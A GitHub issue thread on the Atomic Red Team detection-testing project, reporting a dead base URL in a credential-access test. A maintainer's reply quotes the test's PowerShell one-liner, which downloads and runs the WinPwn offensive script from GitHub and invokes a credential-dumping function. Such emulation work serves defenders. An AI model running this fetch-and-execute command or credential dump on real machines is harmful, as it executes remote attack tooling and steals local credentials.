### ISSUE TITLE
Problem: 404 for https://raw.githubusercontent.com/S3cur3Th1sSh1t 

### ISSUE THREAD

**Issue by chandangupta1997** [redcanaryco/atomic-red-team#2771]
## What did you do?

https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.003/T1078.003.md#atomic-test-6---winpwn---loot-local-credentials---powerhell-kittie           
404 for https://raw.githubusercontent.com/S3cur3Th1sSh1t

**Comment by clr2of8** [comment]
Yes, that URL gives 404 but the one that is used to download powershell-kittie is functional. Let me know if I'm missing something.
```$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
obfuskittiedump -consoleoutput -noninteractive```
